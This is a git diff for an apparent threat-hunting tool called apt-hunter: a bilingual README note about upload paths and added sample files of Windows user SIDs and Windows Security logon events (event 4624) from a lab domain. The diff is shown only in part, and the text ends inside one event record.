diff --git a/README.md b/README.md
index caf4ef0..68c4643 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,3 @@
 # apt-hunter
-
+- When you upload the file path depth of 2 or more layers, please be sure to note that the file upload path '/' will be translated into the url '%2F' which will create a new folder! Be sure to pay attention!
+- 当你上传的文件路径深度在2层及以上时，请一定要注意文件上传路径'/' 会被url 翻译为 '%2F' 这样会新建一个文件夹！一定要注意！
\ No newline at end of file
diff --git a/source/samples/EventID_Frequency_Analysis.xls b/source/samples/EventID_Frequency_Analysis.xls
new file mode 100644
index 0000000..881d74b
Binary files /dev/null and b/source/samples/EventID_Frequency_Analysis.xls differ
diff --git a/source/samples/Sample_Collected-SIDS.csv b/source/samples/Sample_Collected-SIDS.csv
new file mode 100644
index 0000000..4428ecd
--- /dev/null
+++ b/source/samples/Sample_Collected-SIDS.csv
@@ -0,0 +1,19 @@
+User,SID
+01566S-WIN16-IR$,S-1-5-18
+ANONYMOUS LOGON,S-1-5-7
+IEUser,S-1-5-21-3461203602-4096304019-2269080069-1000
+Administrator,S-1-5-21-308926384-506822093-3341789130-500
+samir,S-1-5-21-308926384-506822093-3341789130-220106
+02694W-WIN10$,S-1-5-21-308926384-506822093-3341789130-84104
+Administrator,S-1-5-21-81107902-1099128984-1836738286-500
+EXCHANGE$,S-1-5-21-2895268558-4179327395-2773671012-1108
+IEUser,S-1-5-21-3583694148-1414552638-2922671848-1000
+lgrove,S-1-5-21-308926384-506822093-3341789130-101606
+a-jbrown,S-1-5-21-308926384-506822093-3341789130-1106
+user01,S-1-5-21-1587066498-1489273250-1035260531-1106
+Administrator,S-1-5-21-1587066498-1489273250-1035260531-500
+Administrator,S-1-5-21-1587066498-1489273250-1035260531-500
+sshd_server,S-1-5-21-3583694148-1414552638-2922671848-1002
+LOCAL SERVICE,S-1-5-19
+NETWORK SERVICE,S-1-5-20
+admin01,S-1-5-21-1587066498-1489273250-1035260531-1108
diff --git a/source/samples/Sample_Logon_Events.csv b/source/samples/Sample_Logon_Events.csv
new file mode 100644
index 0000000..b0b9d60
--- /dev/null
+++ b/source/samples/Sample_Logon_Events.csv
@@ -0,0 +1,13814 @@
+Date and Time,timestamp,Event ID,Account Name,Account Domain,Logon Type,Logon Process,Source IP,Workstation Name,Computer Name,Channel,Original Event Log
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
